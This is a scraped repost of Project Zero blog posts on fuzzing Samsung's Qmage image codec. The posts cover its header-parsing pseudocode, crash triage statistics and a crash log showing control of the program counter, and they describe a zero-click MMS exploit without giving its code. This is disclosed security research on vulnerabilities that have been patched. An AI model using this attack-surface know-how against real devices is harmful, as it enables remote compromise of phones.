Even with this minor obstruction, the fuzzer managed to produce some samples that passed the check (most notably with a length of 257 bytes, which resolves to a 0x00 checksum). At the same time, the post-fuzzing corpus also contained plenty of QG1.2 files, which had me wondering for a long time, because I knew it for a fact that this version didn't exist. When I finally decided to analyze this odd behavior, everything became clear. We have already discussed in Part 1 that the version check in QmageDecCommon_VersionCheck is very permissive and it allows anything ≤ 2.0, so 1.2 passes just fine. But why this specific version? In the SkQmgCodec class, there is a field that denotes the version of the image: 0 for 1.0, 1 for 1.1 and 2 for 2.0. The way it used to be initialized (it seems to be fixed now) was as follows:
  • If version == 2.0, then internal_version = 2
  • Else if version == X.Y, then internal_version = Y

So according to this logic, QG1.2 files were equivalent to QG2.0 for all intents and purposes, except that they were easier to synthesize due to the lack of checksum verification, which is the reason so many of them wound up in my fuzzer's dynamic corpus. I probably wouldn't have come up with it myself given the non-trivial data flow in the header parsing, and it never ceases to amaze me how basic mutations paired with a coverage feedback loop can lead to such unexpected and clever results.Mutation settingsThe mutation settings I used for the fuzzing were very simple and involved five algorithms: flipping bits, randomly changing bytes, inserting "special" integers, performing arithmetic operations on the data, and cutting+pasting random continuous chunks across the input data stream. I also chained pairs of these mutators together, and occasionally invoked Radamsa. The mutation ratios ranged from 0% to 0.1%.ResultsIn this section, I discuss the results of the "final" fuzzing session I ran in January 2020, which uncovered the bugs reported to Samsung in Project Zero Issue #2002.Code coverageIn the case of Qmage, it is difficult to precisely measure the percentage coverage of code relative to the overall size of the codec, because it is just one of many parts of the library, and even the codec itself contains unused and non-reachable code segments that shouldn't be included in the calculations. One way to address this problem is to only count functions with non-zero coverage, assuming that there probably aren't any significant routines completely missed by the corpus. By this metric, I have achieved a 87.30% coverage of the Qmage codec. What is most important, the "heavy" functions responsible for the complex data decoding and decompression are very well covered, with all of them having a coverage rate of >60%, and a great majority being at >80%. The chart below presents the coverage percentage of 34 Qmage functions longer than 4 kB. In total, they sum up to 26670 basic blocks, 23069 of which are covered (86.50%).

On one hand, these rates can be considered a success, but on the other, it may also indicate that 13% of bugs in the code never had a chance to be triggered and are still waiting to be uncovered. That is unless Samsung and/or Quramsoft have since started doing variant analysis or fuzzing of their own, which is easier and more effective with source code access.CrashesCounting both the Android 9 fuzzing session and the subsequent Android 10 session, the fuzzer ran for about four weeks between December 2019 and January 2020. During this time, it identified 5218 unique crashes, where the uniqueness was defined by the three top-level stack trace entries. This number is surely bloated by some bugs which trigger with different call stacks, but still, by any standard, this is a huge number of ways to crash a library. I find it likely that the Qmage codec had never been subject to fuzzing or a manual audit before, and the prevalent lack of bound checks may even suggest that the codec was never supposed to be exposed to untrusted inputs.
Thanks to the detailed ASAN-like reports accompanying the crashes, it was easy to perform some automated triage and classify them based on the signal type, accessed address, and the instruction causing the exception. I assigned each crash to one of the following categories, sorted by descending severity:
The categorization is highly simplified, but it does give some overview of the types of discovered issues. The "write" crashes are the most severe, because they manifest an attempt to write data to an invalid non-zero address, which is evidence of a memory corruption condition. They are followed by invalid reads of ≥ 8 bytes and crashes in generic memory manipulation functions (memcpy), which may indicate attempts to load pointers from invalid locations, or other problems related to the handling of structures or continuous data blobs. Next we have small invalid reads (1, 2 or 4 bytes), which generally manifest simple out-of-bounds reads of the input buffer, and then "sigabrt" (memory exhaustion and likely non-exploitable stack corruption) and "null-deref" (reads or writes to near-zero addresses), both of which are relatively trivial security threats beyond some DoS attacks.
That said, assessing bugs based on their first invalid memory access is not always reliable. For example, a one-byte overread may be directly followed by a buffer overflow, or a four-byte invalid access may manifest a use-after-free condition, which is much more serious than any random out-of-bounds buffer read. And even correctly interpreting the crash reports was no trivial feat; as I noticed shortly after reporting Issue #2002, some crashes were incorrectly classified as "null-deref" even though they were caused by attempted reads of completely invalid, non-canonical addresses. The reason is that when such a wild address is accessed, the siginfo_t.si_addr field received by the signal handler doesn't accurately reflect that address, and instead contains 0x0. This made the ASAN reports look like NULL pointer dereferences and confused my triage script. The solution was to re-analyze the reports by cross-referencing si_addr with the value of the source register, and an update shown in comment #1 was sent to Samsung on the next day.
What we can infer from the summary with some certainty is that upwards of 95% of the crashes were not critical, but they were an indictment on the overall quality of the code. Specifically, the fact that there were so many "read-1" issues shows that most of the parsing in the codec is implemented at a one-byte granularity, and that there were few to no bounds checks while reading from the input stream (until May 2020). In absolute numbers, however, the quantity of the 3.33% memory corruption bugs was still horrendous in my opinion, and it offered a wide selection of options for successful exploitation.
As a last exercise, we can take a peek at the crash counts divided by the Qmage format version:

We can see that a large number of bugs were found in the oldest QMv1 format, however it is not as useful in attacks as the rest, because it is not correctly supported in all contexts on Android. What I find most interesting here is the rising trend in the number of crashes between QG1.0, 1.1 and 2.0, likely correlated with the growing complexity of the codec. In particular, the latest QG2.0 format introduced in Android 10 added as many issues as there had been in 1.0 + 1.1 altogether! And while there was no shortage of vulnerabilities even in Android 9, the new attack surface certainly worked in my favor as a researcher looking to exploit the codec. I'll get ahead of myself and admit that I did use a flaw in the QG2.0 format in my final MMS exploit, which will be discussed in later parts of this series.What's next?At this point of the story, it was the beginning of February and I had just reported the crashes to Samsung. I knew that Qmage was a zero-click attack surface reachable through MMS. What's more, I ran some of the samples from the "write" category through the Gallery and My Files apps, to see if any of them would trigger any promising faults. After a few tests, I stumbled upon the following crash in logcat:
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS1BSLD:user/release-keys'Revision: '24'ABI: 'arm64'Timestamp: 2020-01-24 09:40:57+0100pid: 31355, tid: 31386, name: thumbnail_threa  >>> <<<uid: 10088signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x4a4a4a4a4a4a4a    x0  0000006ff55dc408  x1  0000006f968eb324  x2  0000000000000001  x3  0000000000000001    x4  4a4a4a4a4a4a4a4a  x5  0000006f968eb31d  x6  00000000000000b3  x7  00000000000000b3    x8  0000000000000000  x9  0000000000000001  x10 0000000000000001  x11 0000000000000001    x12 0000007090d96860  x13 0000000000000001  x14 0000000000000004  x15 0000000000000002    x16 0000007091463000  x17 0000007090ea2d94  x18 0000006f95d1a000  x19 0000006ff5709800    x20 00000000ffffffff  x21 0000006ff55dc408  x22 00000000000000b0  x23 0000006f968ed020    x24 0000000000000001  x25 0000000000000001  x26 0000006f968ed020  x27 0000000000000be5    x28 0000000000012e9a  x29 0000006f968eb370    sp  0000006f968eb310  lr  0000007090f5f7f0  pc  004a4a4a4a4a4a4a
backtrace:      #00 pc 004a4a4a4a4a4a4a  <unknown>      #01 pc 00000000002e97ec  /system/lib64/ (process_run_dec_check_buffer+92) (BuildId: fcab350692b134df9e8756643e9b06a0)      #02 pc 00000000002ddb94  /system/lib64/ (QmageRunLengthDecodeCheckBuffer_Rev11454_141008+1320) (BuildId: fcab350692b134df9e8756643e9b06a0)[...]
The file explorer crashed while trying to execute code from an invalid 0x4a4a4a4a4a4a4a address, which was almost conclusive evidence that the vulnerability could be exploited to execute arbitrary code. This gave me an extra motivational boost to try to write an MMS exploit for a Samsung flagship phone with the then-latest firmware build. As someone relatively new to the Android ecosystem, it was a great opportunity for me to get better acquainted with the system's security model, existing mitigations, and the current state of the art of exploitation. In Project Zero, we often take part in such offensive exercises to put ourselves in the attacker's shoes. Our vulnerability research and exploitation development work leads to structural security improvements, and better drives our and the wider security community's defense efforts.
I had been previously able to find answers to most of my questions regarding the history and inner workings of Qmage, but trying to exploit it generated a completely new set of doubts and challenges I had to face. Some of them were familiar to me as a security engineer, but other seemed completely new:
  • Which bug(s) provided the most powerful primitives, while also being relatively easy to understand and work with?
  • What objects in memory could be reliably overwritten, and how could they be used to achieve anything useful?
  • How to remotely bypass Android ASLR in a constrained MMS environment which mostly works as a one-way communication channel?
  • How to keep the Messages app up and running despite triggering repeated crashes?

It took me a few months of experimentation and trial and error to arrive at satisfactory solutions to these problems. In the end, I managed to get all of the moving parts to work together well enough to construct the interaction-less attack. In an attempt to give some structure to the somewhat chaotic process I went through, my next blog post will focus on finding the optimal heap corruption primitive to act as the foundation of any higher-level mechanisms employed by the exploit.
Kategorie: Hacking & Security

MMS Exploit Part 1: Introduction to the Samsung Qmage Codec and Remote Attack Surface

16 Červenec, 2020 - 18:42
Posted by Mateusz Jurczyk, Project Zero
This post is the first of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
IntroductionIn January 2020, I reported a large volume of crashes in a custom Samsung codec called "Qmage", present in all Samsung phones since late 2014 (Android version 4.4.4+). This codec is written in C/C++ code, and is baked deeply into the Skia graphics library, which is in turn the underlying engine used for nearly all graphics operations in the Android OS. In other words, in addition to the well-known formats such as JPEG and PNG, modern Samsung phones also natively support a proprietary Qmage format, typically denoted by the .qmg file extension. It is automatically enabled for all apps which display images, making it a prime target for remote attacks, as sending pictures is the core functionality of some of the most popular mobile apps.
In May 2020, Samsung released patches addressing the crashes (including a number of buffer overflows and other memory corruption issues) for devices that are eligible for receiving security updates. The issues were collectively assigned CVE-2020-8899 and a Samsung-specific SVE-2020-16747. On the day of the security bulletin being released, I derestricted the relevant #2002 tracker entry, and open-sourced my fuzzing harness on GitHub (SkCodecFuzzer). I recommend reading the original report, as it includes a detailed explanation of the then-current state of the codec, my approach to fuzzing it, and the bugs found as a result. It may provide some valuable context to better understand this and other upcoming blog posts in the series, although I will do my best to make them self-contained and easy to understand on their own.
After reporting the bugs, I spent the next few months trying to build a zero-click MMS exploit for one of the flagship phones: Samsung Galaxy Note 10+ running Android 10. For reference, similar attacks against chat apps were shown to be possible on iPhones via iMessage by Samuel Groß and Natalie Silvanovich of Google Project Zero in 2019 (see demo video, and blog posts #1, #2, #3). On the other hand, to my knowledge, no exploitation attempts of this kind have been publicly documented against Android since the Stagefright vulnerabilities disclosed in 2015. To me, this seemed like a great opportunity to deep dive into the state of the exploit mitigations on Android today, and see how they fared against a relatively powerful bug – a heap-based buffer overflow with controlled buffer size, data length and the data itself. In the end, I managed to develop an exploit which remotely bypassed ASLR and obtained a reverse shell on a victim's phone (with the privileges of the SMS/MMS app) with no user interaction required, in around 100 minutes on average. The official recording of an attack demonstration is available here, and below I am presenting a director's cut of the same video, with a soundtrack added for your viewing pleasure. :)

By publishing this and further blog posts in the Qmage series, I am hoping to shed more light on how I found the codec, what I learned about it during reconnaissance and preparation for fuzzing, and finally how I managed to circumvent various Android mitigations and obstacles along the way to write a reliable MMS exploit. Please join me on this ride!How it startedAs is often the case in vulnerability research (in my experience), there was a bit of luck involved in the finding of this attack surface. In late 2019, Project Zero had a hackathon as part of a team bonding activity, with focus on Samsung phones. We chose Samsung phones as they were the most popular mobile devices in Europe in Q2 2019, when we were planning our event. Other results of that event can also be found in the PZ bug tracker – they were centered mostly around the security of Samsung kernel-mode components, and fixed in February 2020. During the hackathon, we used Samsung Galaxy A50 running Android 9 as our test devices, but the rest of this post is written based on the analysis of a newer Note 10+ and Android 10, which were the latest Samsung flagship devices at the time of this research.
When I was looking for potential bug hunting targets (naturally written in native languages, so that memory corruption issues would apply), my first thought was to look for inspiration in the bug tracker and existing reports from the past. There, the following issues reported by Natalie in 2015 immediately caught my eye:

Memory safety issues in image handling, how splendid! Please note the "Q" in the "libQjpeg" library name in some of the titles – without knowing it, this was my first encounter with the third-party Quramsoft software vendor. I dug into the bug descriptions, but I couldn't find any of the mentioned, or modules on the test device. However, when I searched for some function names extracted from these reports, such as QURAMWINK_DecodeJPEG, I found them in three other files under /system/lib64:

If you're wondering how many more libraries with "quram" in their names there are in the directory, there are three more on the Note 10+:

In general, the various Quram libraries used in a specific Samsung Android build are listed in /system/etc/public.libraries-quram.txt. I think it is worth highlighting that Quramsoft has a portfolio of software solutions related to audio, video, images and animations, both for encoding and decoding. Throughout Android's existence (and even before it), Samsung has worked closely with the third-party vendor and included a number of their libraries in their custom builds of the OS, mostly to support and advance built-in apps such as Camera or Gallery. Over the years, these libraries have been evolving, some of them were renamed and removed, while others were refactored and merged, up to the point where it is objectively hard for a member of the public to keep track which Samsung models have what subset of the libraries installed. However, many of them are still present and are used on the latest phones. I hope this helps clear up any confusion as to why I am referencing Quram libraries outside the context of just the Qmage codec.
Back to the story – after a brief analysis, I narrowed my interest down to the library, which was the largest, most imported one, and seemed to implement support for a variety of image formats. I could easily trigger it through Gallery, but I still struggled to reach it through media scanning, something that Natalie used as the attack vector in many of her bugs. I began to investigate how the media scanner worked, starting with platform/frameworks/base/media/java/android/media/ in AOSP, and specifically the scanSingleFiledoScanFileprocessImageFile path. Here, we can see that all it really boils down to is the usage of the standard BitmapFactory interface:
private boolean processImageFile(String path) {    try {        mBitmapOptions.outWidth = 0;        mBitmapOptions.outHeight = 0;        BitmapFactory.decodeFile(path, mBitmapOptions);        mWidth = mBitmapOptions.outWidth;        mHeight = mBitmapOptions.outHeight;        return mWidth > 0 && mHeight > 0;    } catch (Throwable th) {        // ignore;    }    return false;}
I later verified that very similar code was used by the MediaScanner service on my test Samsung device; the only difference being extra references to an interface and a related library, which appeared irrelevant to my goal of triggering Quram's custom JPEG decoder.Discovering Skia and QmageNot being very familiar with Android and its graphics subsystem at the time, I wanted to dig even deeper into the stack of abstraction and see the actual image decoding code. To achieve that, I followed the execution path of a few more nested methods, first in Java and then crossing into C++ land: BitmapFactory.decodeFiledecodeStreamdecodeStreamInternalnativeDecodeStreamdoDecode. In here, we can finally see the actual logic of decoding an image from a byte stream, first by creating a Skia SkCodec object:
    // Create the codec.    NinePatchPeeker peeker;    std::unique_ptr<SkAndroidCodec> codec;    {        SkCodec::Result result;        std::unique_ptr<SkCodec> c = SkCodec::MakeFromStream(std::move(stream), &result, &peeker);
        codec = SkAndroidCodec::MakeFromCodec(std::move(c));        if (!codec) {            return nullObjectReturn("SkAndroidCodec::MakeFromCodec returned null");        }
… and then calling the getAndroidPixels method on it:
    SkCodec::Result result = codec->getAndroidPixels(decodeInfo, decodingBitmap.getPixels(),            decodingBitmap.rowBytes(), &codecOptions);
So, in order to learn what image formats are supported by the interface, we have to look into SkCodec::MakeFromStream. The upstream version of the method can be found on GitHub; there, we can see that depending on macros defined during compilation, the following types of images can be loaded (based mostly on the gDecoderProcs table):
  • png
  • jpeg
  • webp
  • gif
  • ico
  • bmp
  • wbmp
  • heif
  • raw (dng)

This is already a sizable list of formats. We can compare the open-source implementation with the compiled one found on Samsung phones in /system/lib64/, which is where the Skia code lives on Android now (on older systems, it was located in /system/lib64/ When I originally opened the SkCodec::MakeFromStream method in IDA Pro, I saw an unrolled loop iterating over the standard Skia codecs, but also a few extra file signature checks, namely:
if ( png_sig_cmp(header, 0LL, length) && (!length || *(_DWORD *)header != 'OIP\x89') ){  if ( header[0] == 'Q' && header[1] == 'G' )  {    if ( QuramQmageDecVersionCheck(header) )    {      // ...    }    __android_log_print(6LL, "Qmage", "%s : stream is not a Qmage file\n", "IsQmg");  }  if ( header[0] == 'Q' && header[1] == 'M' )  {    if ( QuramQmageDecVersionCheck_Rev8253_140615(header) )    {      // ...    }    __android_log_print(6LL, "Qmage", "%s : stream_Rev8253_140615 is not a Qmage file\n", "IsQM");  }  else if ( *(_DWORD *)header == 0x5CA1AB13 )  {    // ...  }
There were four additional signatures being checked for:
  1. \x89PIO, an alternative to the standard \x89PNG file magic.
  2. QG, a type of a Qmage file, as indicated by the log string.
  3. QM, another type of a Qmage file.
  4. \x13\xAB\xA1\x5C, magic bytes which represent an Adaptive Scalable Texture Compression (ASTC) image.

After brief analysis, I concluded that PIO and ASTC were not particularly interesting from a security research perspective, and I turned my eyes to Qmage. It looked like the obvious choice, considering that had hundreds of functions containing "quram", "qmage", or other related strings, these routines performed low-level file format parsing, and many of them were extremely long. The codec seemed so complex and so deeply integrated in Android that it got me really intrigued. An additional factor in all this was that I had never heard about it before, and even using Google search wasn't of much help either. In offensive security, this is usually a very strong indicator of an attractive research target, so I had no choice – I had to put my detective cap on and investigate further.Learning more about the codecAt this stage, I had many questions roaming in my head, and hardly any answers:
  • What is this codec? How does it work?
  • What is the history behind it? How long has it been shipping? Is it present in all Samsung phones?
  • What is its intended use, and where to find samples to start playing with?
  • What is the security posture of the code?

Finding the answers took me many weeks, but for the sake of brevity, I will present an accelerated account of the events, which skips over some periods of confusion and attempts to make sense of the partial information available at the time. :)Format versioningSo far, we know that there are two possible magic values for Qmage files: QM and QG. If we look deeper into QuramQmageDecVersionCheck → QmageDecCommon_VersionCheck, which is the second part of the header check, we will see the following logic (in C-like pseudocode):
int QmageDecCommon_VersionCheck(unsigned __int8 *data) {
  if ((data[0] | (data[1] << 8)) != 'GQ') {    debug_QmageDecError = -5;    return 0;  }
  if (data[2] > 2 || (data[2] == 2 && data[3] != 0)) {    debug_QmageDecError = -5;    return 0;  }
  return 1;}
The function verifies the QG signature again, and then treats the next two bytes as the version identifier. If we assume that data[2] and data[3] are major and minor version numbers respectively, then according to the code above, versions ≤ 2.0 are supported. In fact, this is a really permissive way of implementing the check, because it allows through a number of versions that don't really exist. At the time of this writing, I already know that there are three actual valid versions of the QG format:
  • QG 1.0
  • QG 1.1
  • QG 2.0

Other combinations of major/minor versions (such as 1.231) are either ignored by the codec, or resolve to one of the three above.
To learn more about the versioning of QM images, we can similarly follow the QuramQmageDecVersionCheck_Rev8253_140615 → QmageDecCommon_VersionCheck_Rev8253_140615 functions in our disassembler, which will lead us to the following logic:
int QmageDecCommon_VersionCheck_Rev8253_140615(unsigned __int8 *data) {
  if (*(unsigned short *)&data[0] == 'MI') {    if ( data[7] - 90 < 4 )      return 1;  }  else if (*(unsigned short *)&data[0] == 'TI' ) {    if ((data[5] & 0x7F) == 21)      return 1;  }  else if (*(unsigned int *)&data[0] == 'GEFI') {    if ((data[11] & 0x7F) == 21)      return 1;  }  else if (*(unsigned short *)&data[0] == 'WQ') {    if (data[2] > 0xC)      return 1;  }  else if (*(unsigned int *)&data[0] == '`RFP') {    if (*(unsigned int*)&data[4] == 0)      return 1;  }  else if (*(unsigned short *)&data[0] == 'MQ' && data[2] == 1) {    return 1;  }
  debug_QmageDecError = -5;  return 0;}
This is definitely more code than expected. We are primarily interested in the last if statement, where we can see that a 0x01 byte is expected to follow the QM magic. Again assuming that this is the version number, we can note down that a version 1 of the QM format is supported by the modern Samsung build of Skia. However, there are also a number of other signatures being checked for: IM, IT, IFEG, QW and PFR. I don't know exactly what formats they represent, and since the above routine can only be reached through a QM header detected in SkCodec::MakeFromStream, the signatures don't really seem to be intentional there. More likely, they are leftover artifacts manifesting file formats parsed by Quramsoft code elsewhere, or got deprecated and aren't in active use anymore at all. We might see these constants again in the future so it's worth keeping them in mind.
In summary, there are four distinct versions of Qmage supported by Skia, in chronological order: QMv1, QG1.0, QG1.1, QG2.0. This is especially self-evident when looking at the list of debug symbols found in For each symbol that has existed in the QMv1 codec all the way to QG2.0, there are now four copies of the given variable/function/etc., for example:

The names without any suffixes represent parts of the code for the latest format (QG 2.0). For each earlier format, there seems to be a fork of the code with all functions, structures, static objects etc. renamed to include a revision number and a second numeric part which looks like a date. If my understanding is correct, that would mean that the cut-off dates for the QMv1, QG1.0 and QG1.1 versions of the format were around June 2014, Oct 2014 and Feb 2015 – a relatively short period of time. The QG2.0 iteration was first seen in January 2020 in Android 10, but being the most recent, it lacks the convenient _RevXXXX_YYMMDD suffix to tell us exactly which revision number it is.
However, there are also other bits and pieces of information regarding the versioning of the codec itself to be found in the precompiled Skia binaries. For example, there is an empty function called QmageDecCommon_QmageVersion_1_11_00 in the current build of Furthermore, there is also an unused QuramQmageGetDecoderVersion function in the library, which prints out some other kind of four-part version number, and the exact build date and time, for example:
void QuramQmageGetDecoderVersion() {  __android_log_print(ANDROID_LOG_INFO, "QG", "Quram Qmage Decoder Info\n");  __android_log_print(ANDROID_LOG_INFO, "QG", "Version\t : %d.%d.%d.%d\n", 2, 0, 4, 21541);  __android_log_print(ANDROID_LOG_INFO, "QG", "Build Date\t : %s %s\n", "Mar 17 2020", "19:18:14");}
If the version number is represented by four X.Y.Z.R integers, then the X.Y pair denotes the highest version of the QG format that the codec supports (in this case, QG2.0), and R is the revision number of the code. By studying the countless builds of and found in archival Samsung firmwares released over the years, one could create a very accurate record of all the different Qmage compilations ever shipped with Samsung devices. My limited analysis has resulted in the following, undoubtedly incomplete table:
Build DateBuild TimeXYZRJun 15 2014QMv1 codec8253Nov 14 201420:12:0310010484Nov 17 201416:25:1910010484Jun 12 201519:23:0311114470Jul 3 201520:40:4911114470Jul 6 201511:52:2711114470Sep 2 201516:27:4211114470Nov 27 201520:39:1011114470Dec 21 201518:29:3111214470May 27 201615:57:0011421541Sep 8 201617:42:2911421541Nov 8 201720:52:1611421541Jan 11 201820:31:1511421541Sep 26 201917:06:3620421541Feb 28 202009:26:3220421541Mar 17 202019:18:1420421541May 28 202008:53:2020421541
Based on the above information, we can confirm some of our existing presumptions, and draw new conclusions:
  • The codec's appearance in Skia goes back to around mid-2014.
  • It saw the most activity in development between 2014 and 2016, followed by a few years of relative inactivity, to come back again with a new version 2.0 of the format, first compiled for production use in September 2019.
  • The Z component of the version (4) and the revision number (21541) haven't changed since 2016, limiting our insight into the volume of recent changes in the code base.

For those like me who are interested in small interesting pieces of metadata, there are even more artifacts to be found in the library. For example, there are three copies of the QuramQmageGetDecoderVersion function in on Samsung Android 10 (for each version of the QG format), and there are both 32-bit and 64-bit builds of the shared object in the system, so for one compilation of the Qmage codecs, we get six different timestamps taken during the process. On the example of the build from 26 September 2019:
VersionBitnessBuild timestamp2.032-bit17:05:081.132-bit17:06:161.032-bit17:06:172.064-bit17:06:361.164-bit17:07:451.064-bit17:07:46
I don't think there is any information that can be derived from it with full certainty, but I still find it fascinating enough to include here. At the very least, the 2m36s gap between the first and last timestamp gives us a clue as to the extent of complexity of the codec.Codec size, basic control flow and compression typesWhen we open up in IDA Pro and start inspecting the Qmage code in compiled form, the above build times may start to make sense. In the few builds of the library that I've tested, the Qmage-related code is placed in one continuous binary blob, which makes it easy to measure its size. For example, in the 26-Sep-2019 build (, the first function in the Qmage-related chunk is QmageDecoderLicenseCheck, and the last one is SetResidualCoeffs_C. The overall code region between them is almost 908 kB in size (!), or around 15% of the overall executable segment in the shared object. In large part, this is due to the QG2.0 codec added in Android 10, which introduces more code duplication (new forks of most Qmage-related functions) and imports a whole new copy of libwebp. But even on Android 9 and the 8-Nov-2017 build, the codec is ~425 kB long.
Below is a list of the 20 longest functions found in Notice how 18/20 of them are related to Qmage:

Let's now move onto the control flow and entry points of the codec. When a Qmage image is loaded through an Android interface such as BitmapFactory, execution ends up in the doDecode function, which then calls SkCodec::MakeFromStream, as discussed above. Then, if the first few bytes match the "QG" signature, execution reaches SkQmgCodec::MakeFromStream and further nested functions for header parsing:
SkQmgCodec::MakeFromStream└── ParseHeader    └── QuramQmageDecParseHeader        ├── QmageDecCommon_ParseHeader        │   └── QmageDecCommon_QGetDecoderInfo        └── QmageDecCommon_MakeColorTableExtendIndex
The flow is very similar for the older QMv1 files. This basic parsing is sufficient to extract essential information about the bitmap such as its dimensions, so if the inJustDecodeBounds flag is set in BitmapFactory.Options, the processing of the file ends here. However, even though the header parsing logic is short and simple compared to the full bitmap decoding, I still managed to find memory corruption issues there related to building the color table in memory. So, even processes that only query the bounds of untrusted images, such as the MediaScanner service, were prone to attacks via Qmage. But let's not get ahead of ourselves. If the full bitmap data is requested by the caller (e.g. for an app to display it), execution proceeds to SkQmgCodec::onGetPixels and deeper down:
SkQmgCodec::onGetPixels└── QuramQmageDecodeFrame    └── Qmage_WDecodeFrame_Low        └── _QM_WCodec_decode            ├── PVcodecDecoderIndex            ├── PVcodecDecoderGrayScale            └── PVcodecDecoder
Up until this point, the consecutive functions are mostly simple wrappers over the next nested routines, without much data processing logic involved. This changes with the PVcodecDecoder[...] family, which finally choose the relevant low-level codec and call one of the corresponding long, complex functions which do the heavy lifting, such as PVcodecDecoder_1channel_32bits_NEW or QuramQumageDecoder32bit24bit. The subset of available compression types varies between different versions of Qmage; I have performed a cursory analysis and documented them in the table below. Some of them implement well-known concepts such as Run-Length Encoding (RLE) or zlib inflation, while others (the most complex ones) seem to execute custom, proprietary decompression algorithms.

It's worth noting that even as some of these compression types are no longer found in the most recent version of the codec, they are still present and reachable through the older versions supported on Samsung devices. A minor exception is the QMv1 format, which sometimes fails to load in Skia in certain contexts, probably due to its obsolescence and lack of proper testing on modern devices.
It's also interesting that at this level of abstraction, the QG2.0 format doesn't introduce any new codecs of its own. That doesn't mean that it's only a minor revision compared to QG1.1 – on the contrary, it does bring in a vast amount of new functions, just at a different level of the call hierarchy:
[...]│├── QuramQumageDecoder32bit24bit│   ├── DecodePrediction2dZip│   ├── DecodePrediction2dZip_1L│   └── QmageDecodeStreamGet_GMH│├── QmageDiffZipDecode│   └── QmageSubUnCompress│       └── qme_uncompress│           └── qme_inflateInit│           └── qme_inflate│           └── qme_inflateEnd│└── PVcodecDecoder_zip    ├── Qmage7zUnCompress    ├── QmageBinUnCompress    └── Vp8XxD_QMG        ├── VP8LNew_QMG        ├── WebPResetDecParams_QMG        ├── VP8InitIoInternal_QMG        ├── VP8LDecodeHeader_QMG        └── XxDecodeImageData__QMG
Instead of adding new compression types, the QG2.0 format seems to build on and improve the existing ones. It also imports the zlib 1.2.8 library, with each of its functions prepended with the qme_ prefix, and a whole second copy of libwebp (one is already used by Skia), with all of its symbols appended with a _QMG suffix. One could presume that the addition of libwebp indicates some kind of webp-in-qmage "inception" feature, but based on the fact that a great majority of the library is never referenced, it's more likely that Qmage simply borrows a few functions from libwebp, but just happens to link in the whole library. It was one of many unorthodox development practices that had been apparent in the codec so far.
I hope this sheds some light on the structure of the code and the versioning of .qmg files. With some basic knowledge of the inner workings of the format, we can now look for some actual examples of such images to play and experiment with.Finding input samplesBased on the available information, we can presume that the Qmage format was not introduced in Skia for user-generated content, but rather for static resources in Samsung-manufactured APKs (built-in apps and themes). This is where we can look for an initial set of test cases for fuzzing and manual experimentation. However, please note that throughout the years, APK resources in Samsung firmwares have shipped in a variety of formats and file extensions:
  • Qmage (.qmg, .qio)
  • ASTC (.astc, .atc)
  • PNG (.png, .pio)
  • BMP (.bmp)
  • JPEG (.jpeg)
  • SVG (.svg)
  • webp (.webp)
  • SPR (.spr)
  • Binary XML (.xml)

It is not clear to me how the device model, Android version, year of release, country code or other characteristics of a specific Samsung firmware are factored in in the determination of which format to use for a given resource in a given app. Sometimes all bitmaps were encoded in a single format (e.g. PNG, Qmage, ASTC), and in other cases up to six different formats were used in the scope of one APK. This is still largely a mystery to me. However, I can say for sure that I have had the most luck finding .qmg files in the firmware of Android 4.4.4, 5.0.1, 5.1.1 and 6.0.1 for Samsung Galaxy Note 3, 4 and 5 released in 2014-2016. That said, please note that this is just an example and a variety of other firmwares also include Qmage samples.
As mentioned in the bug tracker entry, I have been able to identify legitimate QMv1, QG1.0 and QG1.1 samples during my research. While the codec for QG2.0 is present in Skia on Android 10, I haven't encountered any genuine bitmaps encoded in this new format thus far, despite spending a little bit of time looking for them. Consequently, in order to achieve a satisfying degree of code coverage of the QG2.0 codec, I had to synthesize such files through the fuzzing of existing QG1.x test cases that I had at my disposal. I'll go into this in more detail in the next blog post.
To obtain some actual files to look at, let's examine the firmware of Samsung Galaxy Note 4, Android 6.0.1, for Switzerland, built on 3 May 2016 (fun fact: about half of Project Zero is based in Switzerland). Once we have access to the system partition, we can dig into the default apps stored in /system/app and /system/priv-app. My go-to app to look for Qmage samples is /system/priv-app/SecSettings/SecSettings.apk. An APK is essentially a ZIP archive, so we can extract it, open it in our favorite file manager and browse to the res/ subdirectory. In there, we'll see:

We are interested in the drawable subdirectories, for example drawable-xxxhdpi-v4:

There they are, actual embedded Qmage files! They are noticeably mixed with some .pio (png) images, as well as a few other formats (webp, xml, jpeg, spr) not shown in the screenshot. Let's take the accessibility_light_easy_off.qmg file out for testing. In a hex editor, we can see that it's in fact a QG1.1 file (see first four bytes):

The basic header of Qmage files is 12 bytes long and has the following structure:
MagicVersionFlagsQual.WidthHeightExtra'Q''G'0x010x010x010x280x5B0x580x010x580x010x00Interpreted as:QG1.1.10x28913443440
So in this example, we are dealing with a lossy (quality 91/100) bitmap with 344x344 dimensions. Let's try to get it loaded on a real device to see if it's displayed correctly. To achieve that, it is important to give the file a standard image extension such as .png or .jpg, since .qmg files are not recognized as images by default. Once we change the extension and copy the file to a Samsung phone, we can view it in Gallery or any other app which displays bitmaps:

It works! What happens if we send the Qmage image via MMS?

Success again. This confirms that Qmage files are indeed seamlessly supported on Samsung devices the same way other standard formats are, which makes them an equally important attack surface. We can now fire up a debugger, attach it, for example, to the Gallery process (, set a breakpoint on one of the codec entry points and follow the execution flow to better understand how it works. We can also start manually flipping bits to see how resistant the codec is against corrupted input, or collect the samples in preparation for an automated fuzzing session. With a number of valid Qmage-encoded files to play with, our testing capabilities are suddenly greatly extended. Before we get to that, though, let's see if we can find any more debug symbols or other publicly available metadata, which might prove useful in future bug root cause analysis or exploit development.Finding traces of open-source codeIn the early stages of exploring old or obscure technologies, I like to refer to GitHub as a source of information. It can help identify open-source code related to the subject in question, otherwise not indexed by web search engines and hard to find by the usual means. This worked well here as well – when I typed "qmage" into the search box, I got a number of interesting hits. Perhaps the most helpful one revealed that Samsung used to open-source its custom Skia modifications, including a wrapper class for Qmage. To access it through the official channels, you can go to, navigate to RELEASE CENTER → Mobile, and look for packages with names containing "_LL_", and with over 1.0 GB in size (for example The two letters most likely signify the Android version, i.e. LL for Android Lollipop (version 5.x).

